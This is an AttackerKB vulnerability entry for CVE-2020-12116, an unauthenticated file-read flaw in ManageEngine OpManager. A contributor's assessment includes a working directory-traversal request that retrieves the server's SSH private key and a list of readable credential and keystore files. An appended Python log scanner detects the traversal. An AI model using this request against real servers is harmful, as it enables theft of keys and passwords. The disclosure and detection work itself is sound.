AttackerKB AKB:3A4ED4F4-813A-496D-B9E4-2FAB85D16287
History: May 07, 2020 - 12:00 a.m.

CVE-2020-12116


EPSS: 0.973 (percentile: 99.9%)

Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a crafted request.

Recent assessments:

Mad-robot at July 05, 2020 1:47pm UTC reported:

Unauthenticated arbitrary file read on ManageEngine OpManager

DESCRIPTION

The latest release of OpManager contains a directory traversal vulnerability that allows unrestricted access to every file in the OpManager application. This includes private SSH keys, password-protected Java keystores, and configuration files containing passwords to keystores, private certificates, and the backend database. If LDAP is configured, then domain credentials can be obtained from “conf/OpManager/ldap.conf”.

PROOF OF CONCEPT
REQUEST:

GET /cachestart/125116/cacheend/apiclient/fluidicv2/javascript/jquery/../../../../bin/.ssh_host_rsa_key HTTP/1.1
Host: <HOSTNAME>:8060
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
Cache-Control: max-age=0
Referer: http://<HOSTNAME>:8060/

RESPONSE:

HTTP/1.1 200 
Set-Cookie: JSESSIONID=4E221B342BC080BC9AC2D19378364E3B; Path=/; HttpOnly
X-FRAME-OPTIONS: DENY
Accept-Ranges: bytes
ETag: W/"902-1586033949624"
Last-Modified: Sat, 04 Apr 2020 20:59:09 GMT
Vary: Accept-Encoding
Date: Mon, 13 Apr 2020 15:40:01 GMT
Connection: close
Content-Length: 902

-----BEGIN RSA PRIVATE KEY-----
MIICX...pXqnO
-----END RSA PRIVATE KEY-----

Here are the files you can read:

		"bin/.ssh_host_dsa_key",
		"bin/.ssh_host_dsa_key.pub",
		"bin/.ssh_host_rsa_key",
		"bin/.ssh_host_rsa_key.pub",
		"conf/client.keystore",
		"conf/customer-config.xml",
		"conf/database_params.conf",
		"conf/FirewallAnalyzer/aaa_auth-conf.xml",
		"conf/FirewallAnalyzer/auth-conf_ppm.xml",
		"conf/gateway.conf",
		"conf/itom.truststore",
		"conf/netflow/auth-conf.xml",
		"conf/netflow/server.xml",
		"conf/netflow/ssl_server.xml",
		"conf/NFAEE/cs_server.xml",
		"conf/OpManager/database_params.conf",
		"conf/OpManager/database_params_DE.conf",
		"conf/OpManager/ldap.conf",
		"conf/OpManager/MicrosoftSQL/database_params.conf",
		"conf/OpManager/POSTGRESQL/database_params.conf",
		"conf/OpManager/POSTGRESQL/database_params_DE.conf",
		"conf/OpManager/securitydbData.xml",
		"conf/OpManager/SnmpDefaultProperties.xml",
		"conf/Oputils/snmp/Community.xml",
		"conf/Persistence/DBconfig.xml",
		"conf/Persistence/persistence-configurations.xml",
		"conf/pmp/PMP_API.conf",
		"conf/pmp/pmp_server_cert.p12",
		"conf/product-config.xml",
		"conf/SANSeed.xml",
		"conf/server.keystore",
		"conf/server.xml",
		"conf/system_properties.conf",
		"conf/tomcat-users.xml",
		"lib/OPM_APNS_Cert.p12"

Assessed Attacker Value: 0
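
Added example, not part of the original assessment or of any ManageEngine code: a log check for the request pattern shown in the proof of concept above, reporting which file each traversal resolves to so it can be matched against the list of readable files. It assumes the web server writes Common Log Format and logs the raw request target; it also goes slightly beyond the request on the page by catching percent-encoded and backslash variants of the ".." segments. The sample log lines are constructed.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Assumption: Common Log Format, with the raw (undecoded) request target recorded.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})\b')
# Static-cache URL prefix as it appears in the request on this page.
CACHE_PREFIX_RE = re.compile(r"^/cachestart/\d+/cacheend/")

def decode_fully(path, max_rounds=3):
    """Percent-decode repeatedly so %2e%2e and %252e%252e both become '..'."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")

def inspect_line(line):
    """Return a finding dict if the line is a traversal through the cache URL, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    path = decode_fully(urlsplit(m["target"]).path)
    prefix = CACHE_PREFIX_RE.match(path)
    if not prefix or ".." not in path.split("/"):
        return None
    return {
        "client": m["ip"],
        # File the request resolves to, relative to the cache prefix.
        "resolved": posixpath.normpath(path[prefix.end():]),
        # A 200 means content was returned, as in the response shown above.
        "served": m["status"] == "200",
    }

def scan(lines):
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample log lines (documentation IP ranges), not from a real server.
BASE = "/cachestart/125116/cacheend/apiclient/fluidicv2/javascript/jquery/"
SAMPLE_LOG = [
    f'192.0.2.10 - - [13/Apr/2020:15:40:01 +0000] "GET {BASE}../../../../bin/.ssh_host_rsa_key HTTP/1.1" 200 902',
    f'192.0.2.10 - - [13/Apr/2020:15:40:05 +0000] "GET {BASE}%2e%2e/%2e%2e/%2e%2e/%2e%2e/conf/OpManager/ldap.conf HTTP/1.1" 404 0',
    f'198.51.100.7 - - [13/Apr/2020:15:41:00 +0000] "GET {BASE}jquery.min.js HTTP/1.1" 200 8421',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Any finding with "served" set to true means the resolved file should be treated as disclosed and its keys or passwords rotated.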